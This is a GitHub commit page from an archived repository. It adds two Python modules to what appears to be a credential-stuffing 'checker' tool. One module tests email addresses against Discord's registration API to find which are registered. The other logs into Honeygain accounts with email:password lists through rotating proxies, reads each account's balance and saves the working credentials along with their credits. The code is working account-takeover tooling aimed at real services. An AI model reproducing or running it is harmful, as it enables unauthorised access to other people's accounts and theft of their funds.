This repository has been archived by the owner on Feb 23, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 63
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
21 changed files
with
208 additions
and
53 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
from __main__ import checker | ||
from random import choice, random | ||
from requests import post | ||
from modules.functions import bad_proxy, log,save,set_proxy | ||
from string import ascii_letters as l, digits as d | ||
from random import choices | ||
|
||
def check(email:str,password:str): | ||
retries = 0 | ||
while retries != checker.retries: | ||
proxy = set_proxy() | ||
payload = {"fingerprint":"793580565130641419.LGQ5IVlIkNTEQfpHbXcQLA2ABrM","email":email,"username":"".join(choices(l+d,k=6)),"password":"rth21e98!fmPP","invite":None,"consent":True,"date_of_birth":"1993-05-03","gift_code_sku_id":None,"captcha_key":None} | ||
try: | ||
a = post("https://discord.com/api/v8/auth/register",json=payload,proxies=set_proxy(proxy),timeout=checker.timeout).text | ||
if "EMAIL_TYPE_INVALID_EMA" in a or "token" in a or "captcha-required" in a: | ||
retries += 1 | ||
elif "EMAIL_ALREADY_REGISTERED" in a: | ||
if not checker.cui: | ||
log("good",email+":"+password,"DiscordVM") | ||
save("DiscordVM","good",checker.time,email+":"+password) | ||
checker.good += 1 | ||
checker.cpm += 1 | ||
return | ||
else: | ||
raise | ||
except: | ||
bad_proxy(proxy) | ||
checker.errors += 1 | ||
if not checker.cui: | ||
log("bad",email+":"+password,"DiscordVM") | ||
checker.bad += 1 | ||
checker.cpm += 1 | ||
return |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
from __main__ import checker | ||
from requests import post,get | ||
from modules.functions import bad_proxy, log,save,set_proxy | ||
|
||
|
||
def check(email:str,password:str): | ||
retries = 0 | ||
while retries != checker.retries: | ||
proxy = set_proxy() | ||
payload = {"email":email,"password":password} | ||
header = {"Authorization":"Bearer "} | ||
try: | ||
a = post("https://dashboard.honeygain.com/api/v1/users/tokens",json=payload,proxies=set_proxy(proxy),timeout=checker.timeout) | ||
if "Bad credentials." in a.text: | ||
retries += 1 | ||
elif "access_token" in a.text: | ||
header["Authorization"] = "Bearer "+a.json()["data"]["access_token"] | ||
balance = get("https://dashboard.honeygain.com/api/v1/users/balances",headers=header,proxies=set_proxy(proxy),timeout=checker.timeout).json()["data"]["payout"]["credits"] | ||
if not checker.cui: | ||
log("good",email+":"+password,"Honeygain") | ||
if int(balance) > 0: | ||
save("Honeygain","good",checker.time,email+":"+password+f" | Credits: {balance}") | ||
checker.good += 1 | ||
else: | ||
save("Honeygain","custom",checker.time,email+":"+password+f" | Credits: {balance}") | ||
checker.custom += 1 | ||
checker.cpm += 1 | ||
return | ||
else: | ||
raise | ||
except: | ||
bad_proxy(proxy) | ||
checker.errors += 1 | ||
if not checker.cui: log("bad",email+":"+password,"Honeygain") | ||
checker.bad += 1 | ||
checker.cpm += 1 | ||
return |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.